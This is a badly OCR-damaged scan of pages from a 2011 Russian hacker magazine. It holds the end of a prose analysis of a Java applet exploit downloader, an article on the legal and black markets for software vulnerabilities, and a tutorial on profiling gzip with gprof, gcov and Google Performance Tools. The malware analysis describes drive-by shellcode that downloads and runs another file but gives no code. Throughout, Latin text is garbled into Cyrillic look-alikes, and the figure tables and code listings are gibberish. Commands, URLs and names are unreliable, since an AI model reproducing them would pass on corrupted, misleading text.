сэмпле применялись фэйковые строки, произвольные идентифи- 
каторы преобразования строк. 

А что же со вторым шелл-кодом, на который я обратил внимание 
в самом начале? Оказывается, в зависимости от версии Заѵа при- 
меняется либо один, либо другой машинный код. Со вторым все 
аналогично — подвергается «реверсу», дополняется данными из 
Ыті-странички и исполняется после вызова уязвимой функции. 

Заключение 

На этом я заканчиваю обзор ^ѵа-за грузчика. Подводя итоги, можно 
сказать, что в настоящее время зловреды на Ява — не редкость. 
Стоит отметить, что этот сэмпл ходит не отдельно, а выполняет 
определенную роль в загрузках бгіѵе-Ьу. Это очевидно, учитывая, что 
апплет взаимодействует со страничкой, на которой он расположен. 
Также любопытна проверка корректности игі и параметра. Если 
отбросить некоторые ухищрения, описанные выше, то в сухом остат- 
ке мы имеем эксплойт, использующий уязвимость. В нашем примере 
это вызов функции деіБоипбВапк со специфичным аргументом. 
Шелл-код, непосредственно осуществляющий «полезную нагруз- 
ку» в виде скачивания и запуска другого файла, оказался крайне 
неинтересным. Он ничем не отличается от своих собратьев, присут- 
ствующих в рбГках, іаѵазсгірСах и так далее. Как оказалось, важно 
обновлять не только ѴѴіпбоѵѵз и продукты АбоЬе, а еще и виртуаль- 
ную машину ^ѵа. т 
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СЦЕНА 



■ ■ Мария «МіІтіИ» Нефедова (тіігііігагеаі. хакер. ги) 




БАШ В БАБКИ 

Купля-продажа уязвимостей 

о ІТ-индустрия весьма многогранна. По мере сил мы стараемся 
рассказывать тебе о самых интересных, неординарных и прикольных 
ее проявлениях. Сегодняшний рассказ не будет исключением - речь 
пойдет о рынке купли-продажи уязвимостей. Да, представь себе, 
существует и такой. Если хочешь знать, как он работает, читай дальше! 



Лицевая 
сторона медали 

Баг, дырка, уязвимость, сплоит — ох уж эти 
милые хакерскому сердцу слова! Однако, 
оказывается, милы они отнюдь нетолько 
хакерам, тестерам и иже с ними — ещесущес- 
твуютлюди, зарабатывающие на этих самых 
дырах немалые деньги. 

Для начала позволь рассказать тебе о ле- 
гальной стороне вопроса, то есть об офици- 
альном, «белом» рынке. Сформировался он 
давно, явление это отнюдь не новое. Чтобы 
понять почему, достаточно задаться вопро- 
сами: «Когда компьютеры обрели широкую 
популярность и стали массовым явлени- 
ем?», «Какдавно появилисьтакие понятия, 
как софт и дыра?» Примерно одновременно 
с этими событиями совершенно законо- 
мерно зародился рынок по поиску, купле и 
продаже уязвимостей. Спрос, как известно, 
рождает предложение. 

На сегодняшний день крупных игроков в 
этом бизнесе насчитывается немало. Кто 
вообще заинтересован в покупке уязви- 
мостей? Это правительственные агентства, 
поставщики разных коммерческихтулзов, 
крупные пентестерские и консалтинговые 
компании, частныелица и многие другие. 
Если говорить об известных и уже зареко- 
мендовавших себя в этой области именах, 
то, пожалуй, в качестве примера можно 
привести такие компании, как і Оебепзе, 
ЗпоЗоІТ и ѴІІРЕІЧ. 

Назвать конкретные цены на разные дыр- 
ки, ксожалению, не представляется воз- 



можным, потому как цена здесь определя- 
ется совокупностью множества факторов. К 
примеру, ты нашел дырку в ІЕ, сколько она 
стоит? Цена спокойно может колебаться от 
$5 000 до $250 000, ведь на стоимость бага 
влияет все: насколько широко распро- 
странено «дырявое» приложение, много 
ли людей знает об уязвимости, насколько 
сложно было найти баг. Не менее важны и 
другие нюансы, которых насчитываются де- 
сятки — например, включеноли приложе- 
ние по дефолту в состав ОС, найден ли баг 
в серверной части приложения или в кли- 
ентской, требуется ли аутентификация для 
использования дырки, хорошо ли файрво- 
лы справляются с защитой уязвимой соф- 
тины, потребуется ли для работы эксплойта 
«помощь» пользователя и так далее, и тому 
подобное. Многие из этих пунктов входят в 
стандартный «опросный лист» компаний- 
покупателей. 

Итак, давай представим, что ты нашел баг. 
Куда с ним бежать? Вероятно, я тебя огорчу, 
но по-быстрому сбыть дыру с рук и получить 
за нее деньги врядли получится. Во всяком 
случае, легально. Законная продажа в 
среднем занимает от одного до четырех ме- 
сяцев, а иногда этот процесс растягивается 
и на более длительный срок. 

Для начала нужно понять, сколько стоит 
твоя находка и кому можно выгодно ее про- 
дать. Дело в том, что сами производители 
софта редко покупают баги. Нет, конечно, 
ты наверняка слышал отом, что в Могіііа 
готовы заплатить $3 000 за баги в Рі гебох, 



а боодіе за уязвимости в своем браузере 
СЬготе согласен раскошелиться на $3 
133.70 (1337 — это слово еіііе, написанное 
литспичем). Но это скорее исключение из 
правил и РР-ход, нежели распространен- 
ная практика. 

Те, кто серьезно готов покупать дырки, 
перечислены выше. Но и здесь все далеко 
не так гладко, как кажется. Ведь зачастую 
просто взять и выложить всю информацию 
о баге покупателю тоже нельзя, особенно 
если баг новенький, «перспективный» — 
есть риск остаться и без информации, и без 
денег. Таким образом получается, что даже 
правильно описать и преподнести свою 
уязвимость, не выдав ее с потрохами, это 
уже целая наука. 

Крупные игроки рынка, скупающие уяз- 
вимости и эксплойты, вообще имеют для 
покупки багов собственные специальные 
программы, такие как2его йау Іпіііаііѵе 
Цегосіауіпіііаііѵе.сопп ] отТгірріпд РоіпД 
БпозоН ргодгат ( зпоБо^.ЫодзроТсот ) 
или Ше^епзе ѴиІпегаЬіІіІу СопІгіЬиІог 
Ргодгат. Чаще всего в рамкахтаких 
проектов применяется схема «сначала баг, 
потом деньги». То есть, ты будешь обязан 
предоставить всю информацию покупателю 
до совершения сделки. 

Если такой расклад тебя не устраивает, ты 
уверен, что твой багценен и по каким-то 
причинам не хочешь обращаться к«бары- 
гам-перекупщикам», можешь попробовать 
подыскать покупателя сам. Но будь готов к 
долгим мытарствам и привлечению ксдел- 
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Настоящий рассадник багов 




ке третьих сторон в качестве посредника. 
Кстати, последнее бывает актуально даже 
для черного рынка: ведь, какуже было 
сказано, грамотно описать, преподнести 
и ужтем более продемонстрировать свою 
уязвимость покупателю — не самая простая 
задача. Многие предпочитают подстрахо- 
ваться. 

Обратная 
сторона медали 

Как верно отметил Крис Касперски, с кото- 
рым мы обсуждали этот вопрос: «Торговать 
дырами закон не запрещает». Это чистая 
правда, разве что в некоторых странах 
установлены определенные запреты — в 
Германии, например, свобода действий в 
этой области несколько ограничена. 

Если в былые времена одной из основных 
мотиваций искателей багов были престиж 
и крутость, то на сегодня основной дви- 
жущей силой, конечно, являются деньги. 
Фактически у специалиста по компьютер- 
ной безопасности или у хакера есть мно- 
жество вариантов поведения послетого, 
как он нашел баг. Можно честно сообщить 
о нем разработчику, можно выложить его 
на всеобщее обозрение, можно добавить 
красивую строку в свое резюме, а можно 
и продать. Легально или не очень. И вот 
именножажда наживы и приводитнас 
к одному очень забавному аспекту этого 
рынка — зачастую уязвимости продаются 
не по одному разу. 

Основные покупатели дырок — это средне- 
го размера компании, работающие в сфере 
ІТ-безопасности. С частными лицами 
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Баги есть везде, нужно просто 
уметь искать :) 

они практически никогда не работают 
— репутация дороже. Купля-продажа у 
них происходит, так сказать, на верхнем 
уровне — юр. лицо сюр. лицом. Однако 
основные открыватели дыр — это именно 
что физические лица, причем откровенные 
хакеры-ломатели. Для посредничества 
между первыми и вторыми нужны конторы 
типа Юеіюпзе. Но вот незадача — про- 
контролировать хакеров-ломателей все 
же весьма проблематично :]. Допустим, 
человек нашел эксклюзивную инфу о некой 
дырке и продал ее кому-то из крупных 
скупщиков. А потом посидел, подумал и по- 
тихому перепродал ее еще раз. И что с ним 
делать? Не убивать ведь. Да, ты, конечно, 
скажешь, что во избежание такого доста- 
точно просто прописать соответствующий 
пункт в контракте, но не спасает и это. Даже 
если контракт предусматривает полное 
удаление продавцом всей информации 
о дыре или эксплойте после совершения 
сделки, а также подразумевает передачу 
всех прав на эту информацию покупателю, 
стереть информацию о находке у продавца 




1^1* Еыіі 'і ^і МЬ.' 



Ѵ и ір ір і>#і | іКМ щ.і.и'Ычмшіч, 

Дырки продают даже на ЕВау 

из головы, увы, невозможно. Нетникаких 
гарантий, что он потом не восстановит 
все данные и не продаст их из-под полы 
кому-нибудь еще. По сути, покупатель бага 
практически беззащитен в этом вопро- 
се, здесь почти бессильно даже суровое 
законодательство США. Конечно, подать 
в суд и попробовать разобраться можно 
всегда, но, как показывает практика, почти 
никто этим не занимается. А тем временем 
на множестве сайтов и форумов в разделах 
купли-продажи можно найти объявления о 
продаже, покупке или поиске эксплойтов и 
багов. Зачастую все это вообще лежит в от- 
крытом доступе. Адреса подобных ресурсов 
ты наверняка знаешь и сам, но навскидку 
могу назвать хотя бы -ѵазт.ги и апіісЬаі.ги . 
В России и на Украине ситуация с «рынком 



багов» вообще довольно грустная — уяз- 
вимости продают в основном с рук, или же 
багоискатели вовсе работают по заказу. К 
примеру, за реверс патчей нашему брату 
платят порядка $200-350 в день, и на все 
про все обычно уходит около недели вре- 
мени. По общемировым меркам такие рас- 
ценки можно охарактеризовать разве что 
фразой «как рабам на плантации», однако 
для русских это хорошие деньги, тем более 
что самая нелегальная часть этого бизнеса 
— уклонение от налогов. 

Зато миф о том, что «плохие парни» из 
хакерского андеграунда готовы пла- 
тить баснословные суммы за серьезные 
уязвимости, это именно миф. Нет, исто- 
рия наверняка знавала исключения, но, 
поверь, их были единицы. В основном те, 
кто занимается киберпреступлениями на 
широкую ногу, довольствуются услугами 
собственных умельцев — тех самых «рабов 
на плантации». Командам таких реверсе- 
ров и платить приходиться куда меньше, и 
конкретные задачи перед ними поставить 
можно. 

Кто и зачем 
покупает дыры 

Да, спрос рождает предложение, но кто же 
создает этотспрос? Не особенно покривив 
душой можно ответить — все. В свежих 
уязвимостях заинтересованы и разработ- 
чики софта, и пентестеры, и специалисты по 
ИВ, и хакеры, и многие другие лица. Лучше 
всего будет пояснить на примерах. 

У пентестеров, к примеру, спросом пользу- 
ются не только новые дыры. Этим парням 
пригождается все — ведь им, так сказать, 
«для комплекта». Пентестеры используют 
для имитации атак все, что только можно: 
фокус в том, что нормальный ІР5 (Іпігизіоп 
Ргеѵепііоп Зузіет) ругается на все попытки 
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атак, даже если система залатана и атака 
обломалась. То есть, если ты делаешь 
попытку атаки, а админ врубил сниффер, 
то он просечет фишку. Ну а если админ 
получит 1 00 000 алертов в логе? И пусть все 
эти 1 00 000 — это старые и неактуальные 
дыры, зато попробуй разбери, как все-таки 
атаковали. Так что пентестерам нужен хо- 
роший эксплойт-пак, и даже если дыра уже 
год какзалатана, она им все равно полезна. 
Обслуживаюттакой контингент компании 
вроде Іттипііу, Соге Зесигііу и РарісІ7, в 
иструментарий которых, в числе прочего, 
входят и эксплойты с дырками. Кстати, не 
гнушаются пентестеры и покупкой багов с 
рук, у частных лиц. Заплатят они меньше, 
чем крупные скупщики, но зато не особенно 
привередливы в выборе. 

С компаниями, стоящими на передовой ли- 
нии компьютерной безопасности, ситуация 
обратная. Представь себе: клиент купил 
ІР5 некой фирмы, а этот ІР5 не видит и не 
отражает новых атак. Само собой, здесь 
пахнет выброшенными на ветер деньгами, 
судами и другими малоприятными штуками. 
Так что весите- ком пан иям жизненно важно 
узнавать об уязвимостях как можно быстрее. 
Такие компании нетолько покупаютдырки 
за деньги, но и нанимают собственных 



специалистов-ломастеров. Ктомуже есть 
связи. Все более-менее крупные игроки 
рынка тесно работаютс производителями 
и их проблемами. Они видят сорцы. Игроки 
поменьше, не имеющие широкой паутины 
связей и денег на штатных реверсеров, 
вынуждены покупать информацию о дырках, 
как и другие «простые смертные». 
Производителям софта, в свою очередь, 
вообще торопиться некуда. Подумай сам, 
что обычно отвечаеттотже МісгозоЙ, когда 
их спрашивают о дырах? Верно, М5 говорит 
что-то вроде «ладно, мы тут подумали и 
решили выпустить внеплановый патч, ибо, 
да-да, планета в огне, все горит, полыхнуло 
так, что даже мы заметили». Более того, 
производители (даже те, которые серьезно 
относятся кэтим вопросам) инфуодырках 
получают в основном на халяву, не напря- 
гаясь. Схема проста: кто-то нашел дыру, 
обрадовался и по-тихому продал ее некому 
кул-хацкеру, который, в свою очередь, с 
помощью этой дыры атаковал «большую 
рыбу». Админ «большой рыбы» оказался 
не дурак — у него стоит куча снифферов и 
логгеров. Зафиксировав атаку, он отослал 
все данные аверской компании. Аверская 
компания по своим внутренним взаимным 
договоренностям тутже сообщила произ- 



водителю софта, что в его продукте нашли 
уязвимость. Таким образом — всего лишь 
первая реальная эксплуатация бага, а 
информация о нем уже дошла до произво- 
дителя. Да, конечно, если производитель 
будет суетиться сам — он выиграет время. 
Нозачем?На создание патча все равно 
потребуется некоторый срок, да и реальных 
убытков отдырок производитель почти 
никогда не несет. Так что, получается, что об 
уязвимости все равноузнают. И все равно 
ее придется фиксить. Но производителю 
нет смысла платить за то, чтобы узнать о 
ней первым. Именно поэтому предложения 
Могі На и Ѳоодіе — это обычный РР, особен- 
но с учетом того, что «крутость» дыры они 
определяют сами. 

Напоследокзамечу, что все нетакстрашно, 
как может показаться. С одной стороны, 
дырок в современном софте бессчетное 
количество, они стоят неплохих денег, 
продаются и перепродаются из рук в руки, а 
также весьма медленно патчатся. С другой 
стороны, не стоитзабывать отом, что реаль- 
но для массовых и серьезных атак использу- 
ется ничтожный процентэтих самыхуязви- 
мостей. Статистика, видишь ли, утверждает, 
что хакеры в большинстве своем ленивы до 
ужаса : ) . т 



ХАКЕР 02 [145) 201 1 



► 079 










ІЛМІХОЮ 



■ ■ Евгений Зобнин гоЬпіпгадтаіІ. сот 




В поисках 
слабого звена 



Как найти узкие места в приложениях 

• Существует такая статистика: 20% кода выполняется 80% времени. 
Точность ее вряд ли полностью соответствует реальному положению 
вещей, а вот общий смысл довольно интересен: получается, что 
оптимизация всего приложения - занятие неблагодарное и глупое, 
а реальные результаты может дать только оптимизация тех 20% 
приложения, которые выполняются дольше всего. Причем найти эти 
20% не так уж и сложно. 



В этой статье мы будем говорить о профи- 
лировании. Если верить Википедии, то это 
— «сбор характеристик работы программы, 
таких как время выполнения отдельных 
фрагментов, число верно предсказанных 
условных переходов, число кэш-прома- 
хов и так далее». В переводе это означает 
«выявление узких мест программы» (или, 
как говорятанглофилы, «бутылочных 
горлышек»), а именно — всехтехучаст- 
ков кода, на которых программа начинает 
«пробуксовывать», заставляя пользователя 



ждать. Простейшее профилирование можно 
произвести голыми руками (и ниже я покажу, 
какэто сделать), но лучше положиться на 
сообщество, представители которого уже 
создали все необходимые инструменты. 
Первый и популярный инструмент носит имя 
О N11 Ргобіег (или дргоЦ Он исп о кон веков 
используется для профилирования кода, 
генерируемого компилятором ОСС. Второй 
— Ѳ N II Соѵегаде Іезііпд Іооі (дсоѵ), утилита 
для более детального анализа производи- 
тельности. Третий — набор инструментов 



отладки и профилирования под общим 
именем боодіе РеНюгтапсе Тооіз (сокра- 
щенно ОРТ). Ну а четвертый — это Ѵаідгіпсі, 
который хоть и предназначен для поиска 
ошибок работы с памятью, но содержит в 
своем арсенале ряд утилит для анализа 
производительности программ. Начнем, как 
и полагается, с классики. 

6ІЧІІ Ргойіег 

ОЫІІ Ргобіег (дргоЯ — один из старейших 
профайл еров, доступных для операционных 
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Рис.1 Таблицы, генерируемые дргоГ, интуитивно понятны 







Еііг дгярт (н^нЦп 




ІптІагіМу і 


ИИ 7 


йрг й рГ и. 17 птін^ 


1 пАяа V П- 


НІІ 


а Н і, 1 а гм 


ГАМ 


ян 




1*4 


■В*. 36 


1/1 


МІ* 131 


|І| ІИ.Й 


І.М 


Ы . 34 


| 


ІінЬ .ІІІг ш 




4.*4 


№ 34 


VI 


1ІР 1*1 




й.« 


а.м 


VI 


Щ| 




а. и 


□ М 


VI 


С4Щ 




д.м 




1/1 


і1«г_іуіі 1341 




о* 




VI 


а-а-«рІрі_гм|"Го1я |М| 




4.« 




3/3 


ьниМоі НМ 






44 


ѵа. 


ТЯ^ ЯІ-ЯІ І1Я] 




».«■ 


Н.34 


1/1 


ЗгмЦШі ГМ 




Й.М 


*• 14 


і 


Пр [3] 




35.35 


13. п 


VI 


4іПяі* ЕИ 




в-Н 


ИГИ 


VI 


!■ Іпп гт 



Рис.2 На первый взгляд граф дргоГ выглядит 
несколько пуганым, но со временем все 
встает на свои места 



систем типа II N IX. Он входит в состав пакета дсс, и мо- 
жет быть использован для профилирования программ, 
написанных на любом поддерживаемом им языке (а 
это нетолько С/С++, но и ОЬіесбіѵе-С, Аба, баѵа). Сам по 
себе д ргоб не является инструментом профилирования, 
а лишь позволяет отобразить профильную статистику, 
которая накапливается приложением во время работы 
(само собой разумеется, по умолчанию никакое прило- 
жение этого не делает, но может начать, если собрать 
программу с аргументом ’-рд'). 

Рассмотрим, какэто работает в реальныхусловиях. Что- 
бы ощутить все достоинства дргсТ, мы применим ее не к 
какому-нибудь абстрактному, искусственно созданному 
приложению, а к самому настоящему повседневно ис- 
пользуемому. Пусть это будет дгір. Получаем и распако- 
вываем исходники архиватора: 

$ ѵ/деС тт. дгір . огд/дгір-1 . 3 . 3 . Саг . дг 

$ Саг -хгС дгір-1 . 3 . 3 . Саг . дг 

$ ссі дгір-1 .3.3 

Устанавливаем инструменты, необходимые для сборки 
(в ІІЬипІи это делается через инсталляцию мета-пакета 
Ьиііб-еззепііаі): 



$ зисіо арС-деС іпзСаІІ ЬиіІсЗ-еззепСіаІ 

Запускаем конфигуратор сборки, передав в переменной 
окружения СРІ_А68 аргумент ' - рд ' : 

$ СРЬАС8= 1 -рд ' ./сопСідиге 

Компилируем программу: таке. У нас есть бинарник 
дгір, способный вести статистику своего исполнения. 
Каждый его запуск будет сопровождаться генерацией 
файла дтоп.оиб: 

$ . /дгір ~/иЪипСи-10 . 10-с1езкСор-і386 . ізо 
$ 1з -1 дтоп . оиС 

— гѵ7~г — г — 1 ]1т з 1т 24406 2010-11-19 14:47 
дтоп . оиС 

Этот файл не предназначен для чтения человеком, но 
может быть использован для создания подробного отче- 
та об исполнении: 

$ дргоС . /дгір дтоп.оиС > дгір-ргоСіІе . СхС 

Важная часть полученного файла показана на скриншо- 
те 1 . Каждая строка — это статистика исполнения одной 
функции, столбцы — различные показатели. Нас инте- 
ресуют первый, третий, четвертый и седьмой столбцы. 
Они отображают информацию об общем количестве 
времени, затраченном на исполнение функции (первый 
столбец — в процентах, третий — в секундах], количест- 
ве ее вызовов и имени. Попробуем проанализировать 
отчет. Первой в списке идет функция сІеіТабе, которая 
была вызвана всего один раз, но «сожрала» 29% всего 
времени исполнения программы. 

Это реализация алгоритма компрессии, и, если бы 
перед нами стояла задача оптимизировать дгір, мы 
должны были бы начать именно с нее. 22% времени 
ушло на исполнение функции Іопде5І_таІсбі, но, в 
отличие от сіебіаіе, она была вызвана аж 450 613 081 раз, 




> іпбо 

• По умолчанию 
дргоі не выводит 
профильной 
информации для 
функций библиотеки 
Обе, но ситуацию 
можно исправить, 
установив пакет 

I і Ь с 6 - р го б и собрав 
тестируемое с 

библиотекой И Ь с р : 

«ехроН І_Р_РІ_А65= 

' -Іс_р‘». 

• Активировать 
профайлер ОРТ 
можно не только 
с помощью 
переменной 
окружения СРІЧРРО- 
РІІ_Е, но и обрамив 
тестируемый участок 
кода функциями 
РгобІегЗіагШ и Рго- 
бі ІегЗборО , которые 
объявлены в доодіе/ 
ргобііег.бі. 




> ѵѵагпіпд 



Из-за требований 
к безопасности 
ОРТ не сработает 
в отношении 
приложений 
с установленным 
битом 511 Ю. 
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ІРоя пэягь_пеай; г Исай ог гназп спаіп */ 

ІРоя ргеѵ, таЬсН; / р ргеѵіоия таісЬ V 

іпі Ііиаіі; / р 5еі 17 сиггепі Ыоек ігизі Ье Тіийіей 

іпі ша1:с1і_аѵз11аЫе = Ѳ; /* зеі 17 ргеѵіоиз таІсЬ ехізіБ ■/ 
гедіьіег ип&ідпесі тэіс7і_1епді7і - И1М_ЙАТСН-1; /* ІепдІІі о7 Ье&І таісН */ 

17 (сотрМ.еѵеІ <== 3) геіигп {ДЯ1ЯЕ ,7аяі{); /* оріітігеа 7ог Бреей */ 

/* Ргосебй Іііе Іприі Ыоск. щ / 
мІгЛе (ІпокпМеай != Ѳ) { 

/■ ІП5СГІ зігіпд ѵіпгіеѵ[5ігз7аг1г тт . зігзІагІ+З) іп ±1ге 
* йісііопэгу, апй зеі 7іазІі_Меай іо і(іе Ьеай о7 іГіе НазН сМаіл: 

*/ 

ІІЧ5ЕКТ.5ТРІНС. ( 5 І Г 5Ій Г І ( кй*Ц_Гів4гі) ; 

/’ РіпсІ ііге Іопдезі гиіісіі, йізсагсііпд 7 Иове <— ргеѵ_1епд№_ 

V 

ргеѵ_1бпд7Н = пэШіДепдіН, ргаѵ_таіс:І(і = таіс^гагі; 
та*СІ^_1вгіэ^Ь = НІМ_МАТСН-1; 

17 (ЬэбТі МеаР != ІЧН. ЬБ ргеѵ ІепдІІі < шах Іагу ліаісіі && 
аігбіагі 1іа:5Н_Ііеай <= ИАЭ(_0І5Т) { 

/* Трч сІг^гЛІГи І'ИД ^пНд УО ПГЙ1ІРП» таІч-Нм ыН ЕЬ 



Рис.З Утилита дсоѵ позволяет выявить проблемные места на уровне строк исходного кода 



поэтому каждый отдельный вызов функции занимал ничтожное 
количество времени. Это второй кандидат на оптимизацию. Функ- 
ция Ш_\л/іпсІоѵѵ отняла 13% всего времени и была вызвана «всего» 
22 180 раз. Возможно, и в этом случае оптимизация могла бы дать 
резул ьтаты. 

Промотав файл отчета до середины (кстати, сразу за таблицей идет 
подробная справка обо всех ее столбцах, что очень удобно), мы 
доберемся до так называемого «графа вызовов» (Саіі дгарб). Он 
представляет собой таблицу, разбитую на записи, отделенные друг 
от друга пунктиром (повторяющимися знаками минуса). Каждая за- 
пись состоит из нескольких строк, при этом вторая строка вопреки 
здравому смыслу называется «первичной» и описывает функцию, 
которой посвящена запись. Строкой выше располагается описание 
вызывающей ее функции, а ниже — вызываемых ей. 

Столбцы содержат следующее (слева направо): индекс (іпбех, он 
есть только в первичной строке и ничего не значит); процент време- 
ни, уходящий на выполнение функции (% Ііте); количество време- 
ни, затрачиваемое на ее выполнение в секундах (зеіі); количество 
времени, затрачиваемое на выполнение функции и всех вызыва- 
емых ею функций (сЫШгеп); количество вызовов функции (саііесі) 
и ее имя (пате). Граф вызовов оказывается очень полезен, для 
оптимизации чужого кода: становятся видны не только узкие места 
программы, но и логика ее работы, которая может быть неочевидна 
при изучении исходников. 

СЫІІ Соѵегаде іезііпд іооі 

Кроме д ргоГ, компилятор ССС имеет в своем составе еще один 
инструмент профилирования, который позволяет получить более 
детальный отчето выполнении приложения. Утилита называется 
дсоѵ и предназначена для генерации так называемого аннотиро- 
ванного исходного кода, который напротив каждой строки содержит 
количество ее исполнений. 

Это может понадобиться для более глубокого изучения проблем 
приложения, когда функции, виновные в «тормозах», найдены, 
а суть проблемы так и остается неясна (например, непонятно, 
какая строка в многократно вложенном цикле внутри длиннющей 
функции несет ответственность за аномальное падение произво- 
дительности). бсоѵ не может полагаться на статистику, генерируе- 



мую приложением при сборке с флагом ' - рд ' , и требует пересборки с 
флагами '-Іргобіе-агсз' и '-^езі-соѵегаде': 

$ СРЬАСЗ= ' -Іргоіііе-агсз - Шезк-соѵегаде ' 

. /сопіідиге && таке 

Далее приложение необходимо запустить: 

$ . /дгір ~/иЪипки-10 . 10-сІезккор-іЗ 86 . ізо 

Для каждого файла исходного кода будет сгенерирован граф вызо- 
вов, на основе которого можно создать подготовленный для чтения 
человеком аннотированный исходник: 

$ дсоѵ сіеііаке.с 

Рііе ' сіеііаке . с ' 

Ьіпез ехесикесі: 76 . 98% оР 139 

сіе Паке . с : сгеаРіпд ' сЗеРІаРе . с . дсоѵ 1 

Полученный в результате файл состоит изтрех колонок: количес- 
тво исполнений строки, номер строки и сама строка. При этом для 
строк, не содержащих кода, в первой колонке будет стоять знак 
минуса, а для строк, ни разу не выполненных — последовательность 
шарпов: #####. 

Соодіе Регіогтапсе Тооіз 

Ѳоодіе РеіТогтапсе Тооіз (сокращенно ОРТ) — это разработка 
сотрудников Ѳоодіе, предназначенная для поиска утечек памяти и 
узких мест приложений. Как и дргоі, ОРТ не является внешней по 

Чтобы произвести профилирование вручную, достаточно поместить 
вызовы стандартной РОЭІХ-функции деНітеоІбауО вокруг всех нуж- 
дающихся в профилировании функций, а затем вычестьзначение, 
полученное после вызова функции, из значения, полученного до ее 
вызова. Результатом будет длительность исполнения функции. 
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Рис.4 Таблица, генерируемая ОРТ, очень похожа на таблицы дрго? 



отношению ктестируемому приложению программой и заставляет 
его самостоятельно вести статистику своего исполнения. 

Однако используется для этого не внедренный на этапе сборки 
приложения код, а библиотеки, которые могут быть прилинкованы к 
приложению во время сборки или подключены при запуске. Всего 
разработчикам доступно две подключаемых библиотеки: Істаііос 
(которая, поуверению авторов ОРТ, представляет собой самую 
быструю на свете реализацию функции таііос, а также позволяет 
производить анализ того, как память расходуется, выделяется и 
течет] и ргобіег, генерирующая отчето выполнении программы, 
наподобие дргоГ Также в комплект входитутилита рргор предна- 
значенная для анализа и визуализации накопленных данных. 
Исходный код, а также грт- и беб-пакеты всего этого набора 
доступны на официальной страничке [ сосіе.доодіе.сопп/р/аоодіе- 
регбіооіз ] . однако я бы не советовал заморачиваться с ручной уста- 
новкой, так как набор доступен в стандартных репозиториях Ребога 
иІІЬипІи.иего можно установить одной простой командой: 

$ зисіо арЦ-деС іпзСаІІ доодіе-регіъооіз \ 

ІіЪдоодІе-регіЕооІзО ІіЪдоодІе-регіЕооІз-сІеѵ 

Далее приступаем к профилированию. Легче всего это сделать, 
просто подсунув нужную библиотеку прямо во время запуска про- 
граммы с помощью І_0_РРЕІ_0А0: 

$ ЦБ_РКЕЬ0АБ=/изг/1іЬ/1іЬрго^і1ег . зо . О . О . О \ 
СРІІРК0РІЦЕ=д2Ір-рго^і1е . Іод . /дгір \ 

/Ьоте/з Іт/иЬипЕи-ІО . 10-с1езкЦор-і3 8 6 . ізо 

Однако сами гугловцы не советуют применять этот метод (очевидно 
из-за проблем с программами, написанными на С++), рекомендуя 
линковать библиотеку во время сборки. Что ж, не будем спорить. 
Для экспериментов возьмем всетотже дгір и повторно пересобе- 
рем его, слин ковав бинарникс нужной библиотекой: 

$ ссі ~/д2Ір-1 .3.3 

$ таке сіеап 



$ . /сопіідиге 

$ ЬБЕЕАС:3 = ' -Іргоіііег 1 . /сопіідиге && таке 

Теперь дгір вновь готов вести логсвоего исполнения, но не будет 
делать этого по умолчанию. Чтобы активировать профайлер, необ- 
ходимо объявить переменную окружения СРІІРР0РІІ_Е и присвоить 
ей путь до файла профиля: 

$ СРІІРЕ0ЕІЕЕ=д2Ір-сри-рго^і1е . Іод . /дгір \ 

-/иЪипЕи-10 . 10-ЛезкРор-іЗ 86 . ізо 
РКОЕІЬЕ: іпРеггирЦз/еѵісЕіопз/ЬуЦез = 4696/946/91976 

Как и в случае с дргор получившийся отчет имеет бинарную форму 
и может быть прочитан только с использованием специальной 
утилиты. В ОРТ ее роль выполняет регі-скри пт рргоб (в II Ьипіи во 
избежание путаницы с другой одноименной утилитой он переиме- 
нован в доодіе-рргоб), который генерирует не только таблицы и 
аннотированные исходники на манер дсоѵ, но и визуальные графы 
вызовов. Существует 1 1 типов вывода этой утилиты, за каждым 
закреплен соответствующий аргумент командной строки: 

1. Текстовый (--Іехі) —таблица, подобная выводу дргор 

2 . Саіідгіпб (--саіідгіпб) — вывод в формате, совместимом сутили- 
той ксасЬедгіпб (из пакета ѵаідгіпб); 

3. Графический (--дѵ) — граф вызовов, немедленно отображаемый 
на экране; 

4 . Листинг (-- 1із1;=< гедехр>) — аннотированный л истин г указа иной 
функции; 

5 . Дизассемблированный листинг (--б І5а5т=<гедехр>) — анноти- 
рованный дизассемблированный л истин г указа иной функции; 

6 . Символьный (--зутЬоЫ — листинг декодированных символьных 
имен; 

7 . Графический файл (--бор -- рз, --рбр — дТ) — граф вызовов, 
сохраняемый в файл; 

8 . Сырой (--гаѵѵ) — подготовка бинарного файла профиля к переда- 
че по сети (перекодируется с помощью печатаемых символов). 
Наибольший интерес для нас представляюттекстовый ('— ІехГ) и 
графический ('--дѵ') типы вызовов. Только они могут дать полную 
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Рис.5 Граф, генерируемый ОРТ, очень прост и нагляден 



информацию о выполнении приложения и всех его проблемных 
местах. Текстовый вывод генерируется следующим образом: 

$ доодіе-рргоі: --РехР . /дгір дгір-сри-рго^ііе . Іод 

Каквидно на скриншоте4, вывод представляет собойтаблицу с 
перечислением всех функций и затрат на их исполнение. На первый 
взгляд она кажется очень похожей на таблицу, генерируемую ути- 
литой дргоб но это не так. Будучи всего лишь библиотекой, ОРТ не 
может вести статистику исполнения программы также детально и 
точно, как это делает код, внедренный прямо в приложение. 

Поэтому вместо записи всех фактов вызова и выхода из функций 
(поведение программы, собранной с флагом ’-рд'), ОРТ применяет 
метод, называемый сэмплированием. Сто раз в секунду библиотека 
активируетспециальную функцию, в задачи которой входит сбор 
данныхотом, в какойточке втекущий момент происходит выпол- 
нение программы, и запись этих данных в буфер. По завершению 
работы программы из этих данных формируется и записывается на 
диск профильный файл. Именно поэтому в выводе рргоб нет инфор- 
мации о том, сколько раз функция была вызвана за время работы 
программы, или сколько процентов времени ушло на ее исполне- 
ние. Вместо этого для каждой функции указывается количество 
проверок, во время которых было выяснено, что в данный момент 
программа занималась исполнением этой функции. Поэтому коли- 
чество проверок, приведенное для каждой функции, можно смело 
считатьза общее время ее исполнения. 

Во всем остальном таблица сильно напоминает вывод дргоР по фун- 
кции на строку, по показателю на столбец. Всего столбцов шесть: 

1. Количество проверок для данной функции; 

2 . То же число в процентах от общего количества проверок; 

3. Процент проверок на все остальные функции программы; 

4 . Количество проверок для данной функции и всех ее потомков; 

5 . То же число в процентах отобщего количества проверок; 

6 . Имя функции. 

Пона чалу та кой подход к измерению времени исполнения кажется 
слишком неточным, но если сравнитьтаблицы, полученные с помо- 
щью дргоб стаблицами рргоТ становится ясно, что они показывают 



одинаковую картину. Болеетого, ОРТ позволяет изменить количест- 
во проверок на секунду времени с помощью переменной окружения 
